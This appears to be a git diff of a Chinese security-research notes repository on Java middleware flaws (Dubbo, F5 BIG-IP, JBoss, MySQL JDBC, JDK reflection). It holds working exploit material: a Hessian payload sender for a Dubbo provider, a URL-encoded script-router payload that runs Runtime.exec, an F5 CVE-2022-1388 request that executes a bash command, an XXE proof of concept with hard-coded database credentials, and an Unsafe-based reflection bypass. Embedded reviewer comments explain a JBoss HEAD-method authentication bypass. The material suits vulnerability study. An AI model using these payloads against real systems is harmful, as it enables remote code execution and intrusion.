+ out.writeUTF("2.0.2");
+ //todo 此处填写注册中心获取到的service全限定名、版本号、方法名
+ out.writeUTF("com.threedr3am.learn.server.boot.DemoService");
+ out.writeUTF("1.0");
+ out.writeUTF("$invoke");//CVE-2020-11995 $invoke,$invokeAsync,$echo
+ //todo 方法描述不需要修改,因为此处需要指定map的payload去触发
+ out.writeUTF("Ljava/util/Map;");
+ out.writeObject(s);
+ out.writeObject(new HashMap());
+
+ out.flushBuffer();
+ if (out instanceof Cleanable) {
+ ((Cleanable) out).cleanup();
+ }
+
+ Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12);
+ byteArrayOutputStream.write(header);
+ byteArrayOutputStream.write(hessian2ByteArrayOutputStream.toByteArray());
+
+ byte[] bytes = byteArrayOutputStream.toByteArray();
+
+//todo 此处填写被攻击的dubbo服务提供者地址和端口
+ Socket socket = new Socket("127.0.0.1", 12345);
+ OutputStream outputStream = socket.getOutputStream();
+ outputStream.write(bytes);
+ outputStream.flush();
+ outputStream.close();
+ }
+}
+```
+### CVE-2021-25641
+>Dubbo Provider即服务提供方默认使用dubbo协议来进行RPC通信,而dubbo协议默认是使用Hessian2序列化格式进行对象传输的,不过可以通过更改dubbo协议的第三个flag位字节来更改为使用Kryo或FST序列化格式来进行Dubbo Provider反序列化攻击从而绕过针对Hessian2反序列化相关的限制来达到RCE。
+
+https://www.mi1k7ea.com/2021/06/30/%E6%B5%85%E6%9E%90Dubbo-KryoFST%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2021-25641%EF%BC%89/
+
+```
+CVE-2021-25641 利用版本需要判断
+
+一方面dubbo-common必须<=2.7.3版本另一方面fj的版本要<=1.2.49 并且在2.7.4.1的版本中已经更新了fj版本所以不能使用(只是目前)
+
+```
+~~可以整理一个fastjson利用gadget~~
+
+### CVE-2021-30179
+
+分析:https://mp.weixin.qq.com/s/vHJpE2fZ8Lne-xFggoQiAg
+实验:https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247488856&idx=1&sn=ee37514a5bfbf8c35f4ec661a4c7d45a&chksm=903933a8a74ebabecaf9428995491494f20e5b24a15f8d52e79d3a9dac601620c21d097cdc1f&scene=21#wechat_redirect
+
+```
+Apache Dubbo 2.7.0 to 2.7.9
+Apache Dubbo 2.6.0 to 2.6.9
+Apache Dubbo all 2.5.x versions (官方已不再提供支持)
+
+实验:https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247488856&idx=1&sn=ee37514a5bfbf8c35f4ec661a4c7d45a&chksm=903933a8a74ebabecaf9428995491494f20e5b24a15f8d52e79d3a9dac601620c21d097cdc1f&scene=21#wechat_redirect
+
+```
+exp:https://github.com/lz2y/DubboPOC
+```
+Apache Dubbo默认支持泛化引用由服务端API接口暴露的所有方法,这些调用由GenericFilter处理。GenericFilter将根据客户端提供的接口名、方法名、方法参数类型列表,根据反射机制获取对应的方法,再根据客户端提供的反序列化方式将参数进行反序列化成pojo对象。
+
+也就是说需要知道注册中心注册的接口名,方法名,才可以配合攻击。
+```
+也就是需要存在无授权服务注册中心比如zookeeper的无授权去获得接口名和方法名。使用工具**zookeeper-dev-ZooInspector.jar**
+
+**个人认为CVE-2021-30179的主要思路就是Apache Dubbo在处理泛类引用时,提供了多种通过反序列化方式得到对象再生成pojo对象的选择。** 三梦师傅说跟这个思路扩大了反序列化挖掘思路
+
+### CVE-2021-30181
+
+https://articles.zsxq.com/id_28iczv3uhbtk.html
+
+```exp
+script%3A%2F%2F127.0.0.1%2Fcom.threedr3am.learn.server.boot.DemoService%3Fapplication%3Ddubbo-consumer%26category%3Drouters%26check%3Dfalse%26dubbo%3D2.0.2%26init%3Dfalse%26interface%3Dcom.threedr3am.learn.server.boot.DemoService%26metadata-type%3Dremote%26methods%3Dhello%26pid%3D53953%26qos.enable%3Dfalse%26release%3D2.7.7%26revision%3D1.0%26side%3Dconsumer%26sticky%3Dfalse%26timestamp%3D1622381389749%26version%3D1.0%26route%3Dscript%26type%3Djavascript%26rule%3Ds%253D%255B3%255D%253Bs%255B0%255D%253D'%252Fbin%252Fbash'%253Bs%255B1%255D%253D'-c'%253Bs%255B2%255D%253D'open%2520-a%2520calculator'%253Bjava.lang.Runtime.getRuntime().exec(s)%253B
+```
+
+### Dubbo反序列化RCE利用之新拓展面 - Dubbo Rouge攻击客户端
+
+https://xz.aliyun.com/t/7354
+
+**文章中有一点非常强**
+
+
+在一次看了threedr3am师傅的文章太精彩了,简单的说就是通过注册中心上注册恶意rpc服务并且设置序列化为java原生序列化,等待客户端去连接。
+也就是**rouge**,中文名称叫胭脂,hhh 有点美人计的味道了。
+
+### CVE-2021-43297
+
+https://paper.seebug.org/1814/
+
+### Dubbo 2.7.8多个远程代码执行漏洞
+
+https://xz.aliyun.com/t/8917
+
+### CVE-2021-36162
+
+[Apache Dubbo CVE-2021-36162 挖掘过程
+](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247487450&idx=1&sn=895a573a105cff858990df8bb88aafc5&chksm=c187cfcbf6f046ddbe75a826d851ebeafbcc7449e728a6be0e3ad60279ae7689ef14d4181757&mpshare=1&scene=23&srcid=0323KHKv3qtNyGs5a4jlCoz5&sharer_sharetime=1648033016703&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
diff --git a/F5 big/Readme.md b/F5 big/Readme.md
new file mode 100644
index 0000000..cfc206f
--- /dev/null
+++ b/F5 big/Readme.md
@@ -0,0 +1,28 @@
+# F5 big
+
+F5 Networks K52145254:TMUI RCE 漏洞 CVE-2020-5902
++ [HSQLDB反序列化](https://buaq.net/go-84779.html)
+
+
+F5 BIGIP iControl REST CVE-2021-22986
++ [脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用](https://mp.weixin.qq.com/s/cavKq04hNU5pJoTBiPMZkw)
++ [F5 BIGIP iControl REST CVE-2021-22986漏洞分析与利用](https://www.anquanke.com/post/id/236159)
++ [F5 BIG-IP Cookie 信息泄露利用工具](https://mp.weixin.qq.com/s/RzYSA1ADrIQYQxqjug62sg)
++ [漏洞复现-F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)](https://mp.weixin.qq.com/s/CDST3_FcVM8tvB0hTlrsJg)
+
+CVE-2022-1388
++ [BIG-IP(CVE-2022-1388)从修复方案分析出exp](https://mp.weixin.qq.com/s/6gVZVRSDRmeGcNYjTldw1Q)
+```
+POST /mgmt/tm/util/bash HTTP/1.1
+Host:
+Connection: keep-alive, X-F5-Auth-Token
+Authorization: Basic YWRtaW46QVNhc1M=
+Content-Length: 45
+
+{
+"command":"run",
+"utilCmdArgs":"-c id"
+}
+```
++ [CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现](https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw)
++ [CVE-2022-1388:扩展攻击之文件写入](https://mp.weixin.qq.com/s?__biz=MzkwMzM2NDE5OQ==&mid=2247483731&idx=1&sn=6ac2832719258adbbcf718984558d2cb&chksm=c0962a5bf7e1a34daeb3cfbd92b3de27718aa372374b022e5d7f0ab0923e585012d7be7c429d&scene=132#wechat_redirect) **写入的地址/usr/local/www/**
diff --git a/JNI/Readme.md b/JNI/Readme.md
new file mode 100644
index 0000000..167b0db
--- /dev/null
+++ b/JNI/Readme.md
@@ -0,0 +1,3 @@
+# JNI
+
+**通过System.load(path) 去加载dll文件不要求后缀名,可以为任意的后缀名,只有能找到路径。**
diff --git a/JVM/Readme.md b/JVM/Readme.md
new file mode 100644
index 0000000..5c66caf
--- /dev/null
+++ b/JVM/Readme.md
@@ -0,0 +1,5 @@
+# JVM
+
+>自己在学习jvm这本书会记录其中的知识点.
+
++ [通过实例一行一行分析JVM的invokespecial和invokevirtual指令](http://wxweven.win/2017/09/15/JVM-invokespecial%E5%92%8Cinvokevirtual/)
diff --git a/Jboss/README.md b/Jboss/README.md
index 0a7263d..6e56210 100644
--- a/Jboss/README.md
+++ b/Jboss/README.md
@@ -1,6 +1,508 @@
-## jboss介绍:
+# jboss介绍:
JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开放源代码/114160)的[应用服务器](https://baike.baidu.com/item/应用服务器/4971773)。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
自己测试了网上很多工具发现不是特别好用 而且不集中。。。。
所以自己想写一个综合利用的工具。。。
+
++ [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/)
+
+## 反序列化漏洞
+bypass 请求方式是HEAD
+
+**endpoint**
+```
+/invoker/readonly 是一个filter 请求方法随便并且url后面可以加其他的
+/invoker/EJBInvokerServlet
+/invoker/JMXInvokerServlet
+/invoker/readonly/JMXInvokerServlet
+/invoker/restricted/JMXInvokerServlet
+```
+http-invoker.sar 组件的问题
+
+web.xml
+
+```xml
+
+
+
+
+
+
+ ReadOnlyAccessFilter
+ org.jboss.invocation.http.servlet.ReadOnlyAccessFilter
+
+ readOnlyContext
+ readonly
+ The top level JNDI context the filter will enforce
+ read-only access on. If specified only Context.lookup operations
+ will be allowed on this context. Another other operations or lookups
+ on any other context will fail. Do not associate this filter with the
+ JMXInvokerServlets if you want unrestricted access.
+
+
+
+ invokerName
+ jboss:service=NamingBeanImpl
+ The JMX ObjectName of the naming service mbean
+
+
+
+
+
+ ReadOnlyAccessFilter
+ /readonly/*
+
+
+
+
+ EJBInvokerServlet
+ The EJBInvokerServlet receives posts containing serlized
+ MarshalledInvocation objects that are routed to the EJB invoker given by
+ the invokerName init-param. The return content is a serialized
+ MarshalledValue containg the return value of the inovocation, or any
+ exception that may have been thrown.
+
+ org.jboss.invocation.http.servlet.InvokerServlet
+
+ invokerName
+ jboss:service=invoker,type=http
+ The RMI/HTTP EJB compatible invoker
+
+ 1
+
+
+ JMXInvokerServlet
+ The JMXInvokerServlet receives posts containing serlized
+ MarshalledInvocation objects that are routed to the invoker given by
+ the the MBean whose object name hash is specified by the
+ invocation.getObjectName() value. The return content is a serialized
+ MarshalledValue containg the return value of the inovocation, or any
+ exception that may have been thrown.
+
+ org.jboss.invocation.http.servlet.InvokerServlet
+ 1
+
+
+
+ JNDIFactory
+ A servlet that exposes the JBoss JNDI Naming service stub
+ through http. The return content is a serialized
+ MarshalledValue containg the org.jnp.interfaces.Naming stub. This
+ configuration handles requests for the standard JNDI naming service.
+
+ org.jboss.invocation.http.servlet.NamingFactoryServlet
+
+ namingProxyMBean
+ jboss:service=invoker,type=http,target=Naming
+
+
+ proxyAttribute
+ Proxy
+
+ 2
+
+
+
+ ReadOnlyJNDIFactory
+ A servlet that exposes the JBoss JNDI Naming service stub
+ through http, but only for a single read-only context. The return content
+ is a serialized MarshalledValue containg the org.jnp.interfaces.Naming
+ stub.
+
+ org.jboss.invocation.http.servlet.NamingFactoryServlet
+
+ namingProxyMBean
+ jboss:service=invoker,type=http,target=Naming,readonly=true
+
+
+ proxyAttribute
+ Proxy
+
+ 2
+
+
+
+
+ JNDIFactory
+ /JNDIFactory/*
+
+
+
+ ReadOnlyJNDIFactory
+ /ReadOnlyJNDIFactory/*
+
+
+ EJBInvokerServlet
+ /EJBInvokerServlet/*
+
+
+ JMXInvokerServlet
+ /JMXInvokerServlet/*
+
+
+
+ JMXInvokerServlet
+ /readonly/JMXInvokerServlet/*
+
+
+
+
+ JNDIFactory
+ /restricted/JNDIFactory/*
+
+
+ JMXInvokerServlet
+ /restricted/JMXInvokerServlet/*
+
+
+
+
+
+ HttpInvokers
+ An example security config that only allows users with the
+ role HttpInvoker to access the HTTP invoker servlets
+
+ /restricted/*
+ GET
+ POST
+
+
+ HttpInvoker
+
+
+
+ BASIC
+ JBoss HTTP Invoker
+
+
+
+ HttpInvoker
+
+
+```
+org.jboss.invocation.http.servlet.ReadOnlyAccessFilter
+```java
+//
+// Source code recreated from a .class file by IntelliJ IDEA
+// (powered by FernFlower decompiler)
+//
+
+package org.jboss.invocation.http.servlet;
+
+import java.io.IOException;
+import java.io.ObjectInputStream;
+import java.lang.reflect.Method;
+import java.security.Principal;
+import java.util.Map;
+import javax.management.MBeanServer;
+import javax.management.ObjectName;
+import javax.servlet.Filter;
+import javax.servlet.FilterChain;
+import javax.servlet.FilterConfig;
+import javax.servlet.ServletException;
+import javax.servlet.ServletInputStream;
+import javax.servlet.ServletRequest;
+import javax.servlet.ServletResponse;
+import javax.servlet.http.HttpServletRequest;
+import org.jboss.invocation.MarshalledInvocation;
+import org.jboss.logging.Logger;
+import org.jboss.mx.util.MBeanServerLocator;
+
+public class ReadOnlyAccessFilter implements Filter {
+ private static Logger log = Logger.getLogger(ReadOnlyAccessFilter.class);
+ private FilterConfig filterConfig = null;
+ private String readOnlyContext;
+ private Map namingMethodMap;
+
+ public ReadOnlyAccessFilter() {
+ }
+
+ public void init(FilterConfig filterConfig) throws ServletException {
+ this.filterConfig = filterConfig;
+ if (filterConfig != null) {
+ this.readOnlyContext = filterConfig.getInitParameter("readOnlyContext");
+ String invokerName = filterConfig.getInitParameter("invokerName");
+
+ try {
+ MBeanServer mbeanServer = MBeanServerLocator.locateJBoss();
+ ObjectName mbean = new ObjectName(invokerName);
+ this.namingMethodMap = (Map)mbeanServer.getAttribute(mbean, "MethodMap");
+ } catch (Exception var5) {
+ log.error("Failed to init ReadOnlyAccessFilter", var5);
+ throw new ServletException("Failed to init ReadOnlyAccessFilter", var5);
+ }
+ }
+
+ }
+
+ public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
+ HttpServletRequest httpRequest = (HttpServletRequest)request;
+ Principal user = httpRequest.getUserPrincipal();
+ if (user == null && this.readOnlyContext != null) {
+ ServletInputStream sis = request.getInputStream();
+ ObjectInputStream ois = new ObjectInputStream(sis);
+ MarshalledInvocation mi = null;
+
+ try {
+ mi = (MarshalledInvocation)ois.readObject();
+ } catch (ClassNotFoundException var10) {
+ throw new ServletException("Failed to read MarshalledInvocation", var10);
+ }
+
+ request.setAttribute("MarshalledInvocation", mi);
+ mi.setMethodMap(this.namingMethodMap);
+ Method m = mi.getMethod();
+ if (m != null) {
+ this.validateAccess(m, mi);
+ }
+ }
+
+ chain.doFilter(request, response);
+ }
+
+ public void destroy() {
+ }
+
+ public String toString() {
+ if (this.filterConfig == null) {
+ return "NamingAccessFilter()";
+ } else {
+ StringBuffer sb = new StringBuffer("NamingAccessFilter(");
+ sb.append(this.filterConfig);
+ sb.append(")");
+ return sb.toString();
+ }
+ }
+
+ private void validateAccess(Method m, MarshalledInvocation mi) throws ServletException {
+ boolean trace = log.isTraceEnabled();
+ if (trace) {
+ log.trace("Checking against readOnlyContext: " + this.readOnlyContext);
+ }
+
+ String methodName = m.getName();
+ if (!methodName.equals("lookup")) {
+ throw new ServletException("Only lookups against " + this.readOnlyContext + " are allowed");
+ } else {
+ Object[] args = mi.getArguments();
+ Object arg = args.length > 0 ? args[0] : "";
+ String name;
+ if (arg instanceof String) {
+ name = (String)arg;
+ } else {
+ name = arg.toString();
+ }
+
+ if (trace) {
+ log.trace("Checking lookup(" + name + ") against: " + this.readOnlyContext);
+ }
+
+ if (!name.startsWith(this.readOnlyContext)) {
+ throw new ServletException("Lookup(" + name + ") is not under: " + this.readOnlyContext);
+ }
+ }
+ }
+}
+```
+org.jboss.invocation.http.servlet.InvokerServlet
+```java
+//
+// Source code recreated from a .class file by IntelliJ IDEA
+// (powered by FernFlower decompiler)
+//
+
+package org.jboss.invocation.http.servlet;
+
+import java.io.IOException;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.InvocationTargetException;
+import java.security.AccessController;
+import java.security.Principal;
+import java.security.PrivilegedAction;
+import javax.management.MBeanServer;
+import javax.management.MalformedObjectNameException;
+import javax.management.ObjectName;
+import javax.servlet.ServletConfig;
+import javax.servlet.ServletException;
+import javax.servlet.ServletInputStream;
+import javax.servlet.ServletOutputStream;
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import org.jboss.invocation.InvocationException;
+import org.jboss.invocation.MarshalledInvocation;
+import org.jboss.invocation.MarshalledValue;
+import org.jboss.logging.Logger;
+import org.jboss.mx.util.JMXExceptionDecoder;
+import org.jboss.mx.util.MBeanServerLocator;
+import org.jboss.security.SecurityAssociation;
+import org.jboss.system.Registry;
+
+public class InvokerServlet extends HttpServlet {
+ private static Logger log = Logger.getLogger(InvokerServlet.class);
+ private static String REQUEST_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation";
+ private static String RESPONSE_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue";
+ private MBeanServer mbeanServer;
+ private ObjectName localInvokerName;
+
+ public InvokerServlet() {
+ }
+
+ public void init(ServletConfig config) throws ServletException {
+ super.init(config);
+
+ try {
+ String name = config.getInitParameter("invokerName");
+ if (name != null) {
+ this.localInvokerName = new ObjectName(name);
+ log.debug("localInvokerName=" + this.localInvokerName);
+ }
+ } catch (MalformedObjectNameException var3) {
+ throw new ServletException("Failed to build invokerName", var3);
+ }
+
+ this.mbeanServer = MBeanServerLocator.locateJBoss();
+ if (this.mbeanServer == null) {
+ throw new ServletException("Failed to locate the MBeanServer");
+ }
+ }
+
+ public void destroy() {
+ }
+
+ protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
+ boolean trace = log.isTraceEnabled();
+ if (trace) {
+ log.trace("processRequest, ContentLength: " + request.getContentLength());
+ log.trace("processRequest, ContentType: " + request.getContentType());
+ }
+
+ Boolean returnValueAsAttribute = (Boolean)request.getAttribute("returnValueAsAttribute");
+
+ try {
+ response.setContentType(RESPONSE_CONTENT_TYPE);
+ MarshalledInvocation mi = (MarshalledInvocation)request.getAttribute("MarshalledInvocation");
+ if (mi == null) {
+ ServletInputStream sis = request.getInputStream();
+ ObjectInputStream ois = new ObjectInputStream(sis);
+ mi = (MarshalledInvocation)ois.readObject();
+ ois.close();
+ }
+
+ if (mi.getPrincipal() == null && mi.getCredential() == null) {
+ mi.setPrincipal(InvokerServlet.GetPrincipalAction.getPrincipal());
+ mi.setCredential(InvokerServlet.GetCredentialAction.getCredential());
+ }
+
+ Object[] params = new Object[]{mi};
+ String[] sig = new String[]{"org.jboss.invocation.Invocation"};
+ ObjectName invokerName = this.localInvokerName;
+ if (invokerName == null) {
+ Integer nameHash = (Integer)mi.getObjectName();
+ invokerName = (ObjectName)Registry.lookup(nameHash);
+ if (invokerName == null) {
+ throw new ServletException("Failed to find invoker name for hash(" + nameHash + ")");
+ }
+ }
+
+ Object value = this.mbeanServer.invoke(invokerName, "invoke", params, sig);
+ if (returnValueAsAttribute != null && returnValueAsAttribute) {
+ request.setAttribute("returnValue", value);
+ } else {
+ MarshalledValue mv = new MarshalledValue(value);
+ ServletOutputStream sos = response.getOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(sos);
+ oos.writeObject(mv);
+ oos.close();
+ }
+ } catch (Throwable var13) {
+ Throwable t = JMXExceptionDecoder.decode(var13);
+ if (t instanceof InvocationTargetException) {
+ InvocationTargetException ite = (InvocationTargetException)t;
+ t = ite.getTargetException();
+ }
+
+ InvocationException appException = new InvocationException(t);
+ if (returnValueAsAttribute != null && returnValueAsAttribute) {
+ log.debug("Invoke threw exception", t);
+ request.setAttribute("returnValue", appException);
+ } else if (response.isCommitted()) {
+ log.error("Invoke threw exception, and response is already committed", t);
+ } else {
+ response.resetBuffer();
+ MarshalledValue mv = new MarshalledValue(appException);
+ ServletOutputStream sos = response.getOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(sos);
+ oos.writeObject(mv);
+ oos.close();
+ }
+ }
+
+ }
+
+ protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
+ this.processRequest(request, response);
+ }
+
+ protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
+ this.processRequest(request, response);
+ }
+
+ public String getServletInfo() {
+ return "An HTTP to JMX invocation servlet";
+ }
+
+ private static class GetCredentialAction implements PrivilegedAction {
+ static PrivilegedAction ACTION = new InvokerServlet.GetCredentialAction();
+
+ private GetCredentialAction() {
+ }
+
+ public Object run() {
+ Object credential = SecurityAssociation.getCredential();
+ return credential;
+ }
+
+ static Object getCredential() {
+ Object credential = AccessController.doPrivileged(ACTION);
+ return credential;
+ }
+ }
+
+ private static class GetPrincipalAction implements PrivilegedAction {
+ static PrivilegedAction ACTION = new InvokerServlet.GetPrincipalAction();
+
+ private GetPrincipalAction() {
+ }
+
+ public Object run() {
+ Principal principal = SecurityAssociation.getPrincipal();
+ return principal;
+ }
+
+ static Principal getPrincipal() {
+ Principal principal = (Principal)AccessController.doPrivileged(ACTION);
+ return principal;
+ }
+ }
+}
+```
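Review bot: The one-line claim `bypass 请求方式是HEAD` near the top of this hunk is never explained, and the decompiled sources pasted below it contain the explanation, so it should be spelled out. In the web.xml excerpt the `security-constraint` for `/restricted/*` enumerates only `GET` and `POST`, while `InvokerServlet` overrides only `doGet`/`doPost` and `HttpServlet.doHead` delegates to `doGet` by default, so a HEAD request reaches `processRequest` without passing the auth constraint (verify on your target version). Separately, `ReadOnlyAccessFilter.doFilter` calls `new ObjectInputStream(sis).readObject()` on the raw request body before `validateAccess` runs, and `validateAccess` is skipped entirely when `mi.getMethod()` resolves to null, so the "read-only" filter cannot stop gadget-chain deserialization — that is the root cause behind the linked CVE-2017-12149 article and worth one sentence under `## 反序列化漏洞`. Suggested wording for the HEAD line: `HEAD 可绕过:security-constraint 只列了 GET/POST,而 HttpServlet.doHead 默认转到 doGet → processRequest`.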
diff --git a/Jdbc/CVE-2021-2471/Readme.md b/Jdbc/CVE-2021-2471/Readme.md
new file mode 100644
index 0000000..a37a405
--- /dev/null
+++ b/Jdbc/CVE-2021-2471/Readme.md
@@ -0,0 +1,90 @@
+# CVE-2021-2471
+
+By Firebasky
+
+>昨天晚上看twitter,发现jdbc出现了一个xxe漏洞,比较感兴趣,阿里给了介绍但是没有给exp。
+>
+>https://mp.weixin.qq.com/s/erIFMiPNB2XSBJSqXyxuKg
+
+## 分析
+
+文章中介绍了是`getSource`函数造成的原因,那我们就需要先找到这个函数的类。漏洞版本是MySQL JDBC 8.0.27版本之前。所以我们创建maven项目并且添加jdbc的组件。https://mvnrepository.com/artifact/mysql/mysql-connector-java/8.0.26
+
+```xml
+
+
+ mysql
+ mysql-connector-java
+ 8.0.26
+
+```
+
+### 全局搜索
+
+然后搜索getSource函数利用(全局搜索)
+
+
+
+大概是这个在跟进他的实现。确实是这个。。
+
+
+
+### 对比发现漏洞
+
+如果上面的方法感觉不好,那么可以对比来实现,因为文章中介绍了MySQL JDBC 8.0.27版本之前,说明MySQL JDBC 8.0.27就修复了漏洞,那我们下载MySQL JDBC 8.0.27和MySQL JDBC 8.0.26 来使用工具对比jar包看看不一样的地方是啥。
+
+https://github.com/GraxCode/cafecompare
+
+
+
+
+
+现在具体看看**com.mysql.cj.jdbc.getSource**函数
+
+
+
+我们在看看**this.stringRep**怎么设置的
+
+
+
+然后现在去看看怎么调用这个**getSource**函数,就去看看他的接口
+
+
+
+那么现在问题就是创建一个SQLXML对象就欧克,就可以调用其getSource和setString方法。
+
+https://www.docs4dev.com/docs/zh/java/java8/tutorials/jdbc-basics-sqlxml.html#creating_sqlxml
+
+
+
+## exp
+
+```java
+package CVE;
+
+import javax.xml.transform.dom.DOMSource;
+import java.sql.Connection;
+import java.sql.DriverManager;
+import java.sql.SQLException;
+import java.sql.SQLXML;
+
+public class CVE_2021_2471 {
+ public static void main(String[] args) throws SQLException {
+ String poc = "\n" +
+ "\n" +
+ "\n" +
+ "]>\n" +
+ "&sp;";
+ Connection connection = DriverManager.getConnection("jdbc:mysql://127.0.0.1:3306/test", "root", "0210520");
+ SQLXML sqlxml = connection.createSQLXML();
+ sqlxml.setString(poc);
+ sqlxml.getSource(DOMSource.class);//为了绕过clazz.equals(DOMSource.class)
+ }
+}
+```
+
+## 效果
+
+
+
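Review bot: As rendered here, the `poc` string in `CVE_2021_2471.main` contains no XML markup at all — only `]>` and `&sp;` survive across the five concatenated lines — so if the file really reads this way the DOCTYPE that defines the `sp` entity is missing and `setString` will hand the driver an unparseable document; please confirm the markup was lost by rendering and not in the commit. The connection line also hard-codes `"root", "0210520"` for a live MySQL; a PoC that is meant to be shared should take host and credentials from `args` or environment, e.g. `DriverManager.getConnection(args[0], args[1], args[2])`. Finally, the comment on `getSource(DOMSource.class)` says it bypasses `clazz.equals(DOMSource.class)` but never states the fix; since the text above identifies 8.0.27 as the fixed release, a `// fixed in mysql-connector-java 8.0.27: external entities disabled in SQLXML.getSource` line next to the call would make the listing self-contained.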
diff --git a/Jdbc/CVE-2021-2471/img/image-20211022135316052.png b/Jdbc/CVE-2021-2471/img/image-20211022135316052.png
new file mode 100644
index 0000000..e2d9f1d
Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022135316052.png differ
diff --git a/Jdbc/CVE-2021-2471/img/image-20211022135425801.png b/Jdbc/CVE-2021-2471/img/image-20211022135425801.png
new file mode 100644
index 0000000..147258a
Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022135425801.png differ
diff --git a/Jdbc/CVE-2021-2471/img/image-20211022140911655.png b/Jdbc/CVE-2021-2471/img/image-20211022140911655.png
new file mode 100644
index 0000000..bcf9502
Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022140911655.png differ
diff --git a/Jdbc/CVE-2021-2471/img/image-20211022141357429.png b/Jdbc/CVE-2021-2471/img/image-20211022141357429.png
new file mode 100644
index 0000000..7bae134
Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022141357429.png differ
diff --git a/Jdbc/CVE-2021-2471/img/image-20211022141453082.png b/Jdbc/CVE-2021-2471/img/image-20211022141453082.png
new file mode 100644
index 0000000..2bee66b
Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022141453082.png differ
diff --git a/Jdbc/CVE-2021-2471/img/image-20211022141712911.png b/Jdbc/CVE-2021-2471/img/image-20211022141712911.png
new file mode 100644
index 0000000..c967890
Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022141712911.png differ
diff --git a/Jdbc/CVE-2021-2471/img/image-20211022142111106.png b/Jdbc/CVE-2021-2471/img/image-20211022142111106.png
new file mode 100644
index 0000000..44a3c5e
Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022142111106.png differ
diff --git a/Jdbc/CVE-2021-2471/img/image-20211022142331574.png b/Jdbc/CVE-2021-2471/img/image-20211022142331574.png
new file mode 100644
index 0000000..0a8d3b0
Binary files /dev/null and b/Jdbc/CVE-2021-2471/img/image-20211022142331574.png differ
diff --git a/Jdbc/Readme.md b/Jdbc/Readme.md
index 23848a2..a9a133a 100644
--- a/Jdbc/Readme.md
+++ b/Jdbc/Readme.md
@@ -2,3 +2,8 @@
>JDBC(Java DataBase Connectivity)是Java和数据库之间的一个桥梁,是一个 规范 而不是一个实现,能够执行SQL语句。它由一组用Java语言编写的类和接口组成。各种不同类型的数据库都有相应的实现。
+ MySQL JDBC 客户端反序列化漏洞[参考文章](https://xz.aliyun.com/t/8159) [自己调试的漏洞点](./img/1.png) [自己调试的漏洞点](./img/2.png)**J简单的说:在JDBC连接MySQL的过程中,执行了SHOW SESSION STATUS语句。而如果我们控制返回的结果是一个恶意的对象,jdbc就会去执行readobject方法反序列化,从而有入口点,在利用cc链,完美rce。**
+
+## 其他利用
+jdbc 利用方式太多了,慢慢学习(重学)
+
++ [由CVE-2022-21724引申jdbc漏洞](https://mp.weixin.qq.com/s?__biz=MzUzNDMyNjI3Mg==&mid=2247485275&idx=1&sn=e06b07579ecef87f8cce4536d25789ce&chksm=fa973a34cde0b322ef3949c2cf7fc6bf31e945674d2fe313a3dbf63504bdf737f05cba65de18&mpshare=1&scene=23&srcid=0414XqOEScLh3JIaaHk9pp4v&sharer_sharetime=1649906865169&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
diff --git a/Jdk/Readme.md b/Jdk/Readme.md
new file mode 100644
index 0000000..7c4acd2
--- /dev/null
+++ b/Jdk/Readme.md
@@ -0,0 +1,170 @@
+# JDK
+
+jdk>12不能反射修改下面class的成员。
+
+思路是通过unsafe api去修改Reflection类的成员,赋值为null.
+```java
+
+import sun.misc.Unsafe;
+import java.io.ByteArrayOutputStream;
+import java.io.InputStream;
+import java.lang.reflect.Field;
+import java.util.HashMap;
+
+public class bypass {
+ private static Unsafe getUnsafe() {
+ Unsafe unsafe = null;
+ try {
+ Field field = Unsafe.class.getDeclaredField("theUnsafe");
+ field.setAccessible(true);
+ unsafe = (Unsafe) field.get(null);
+ } catch (Exception e) {
+ throw new AssertionError(e);
+ }
+ return unsafe;
+ }
+ public static byte[] readInputStream(InputStream inputStream) {
+ byte[] temp = new byte[4096];
+ int readOneNum = 0;
+ ByteArrayOutputStream bos = new ByteArrayOutputStream();
+ try {
+ while ((readOneNum = inputStream.read(temp)) != -1) {
+ bos.write(temp, 0, readOneNum);
+ }
+ inputStream.close();
+ }catch (Exception e){
+ }
+ return bos.toByteArray();
+ }
+
+ public void bypassReflectionFilter()throws Exception{
+ Unsafe unsafe = getUnsafe();
+ Class reflectionClass=Class.forName("jdk.internal.reflect.Reflection");
